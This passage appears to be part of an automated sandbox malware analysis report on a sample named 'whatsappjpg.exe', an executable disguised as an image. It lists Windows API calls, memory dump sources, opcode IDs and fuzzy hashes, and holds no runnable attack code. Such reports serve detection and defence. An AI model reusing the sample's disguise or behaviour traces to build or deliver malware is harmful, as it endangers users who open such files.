                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                      • lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405A94
                                                      • GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00405AA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID:
                                                      • API String ID: 3248276644-0
                                                      • Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
                                                      • Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
                                                      • Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
                                                      • Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                      • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                      • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                      • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      • Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                      • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                                                      • Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                                                      • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                      • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                      • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                                      • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                      • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                      • Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
                                                      • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                                                      • Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E
                                                      APIs
                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: PathSearch
                                                      • String ID:
                                                      • API String ID: 2203818243-0
                                                      • Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                      • Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
                                                      • Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
                                                      • Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                      • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
                                                      • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                      • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
                                                      APIs
                                                      • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                      • Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
                                                      • Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
                                                      • Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A
                                                      APIs
                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                      • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                                      • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                      • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                      • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                      • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                      • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                      • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                      • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                      • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                      APIs
                                                      • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
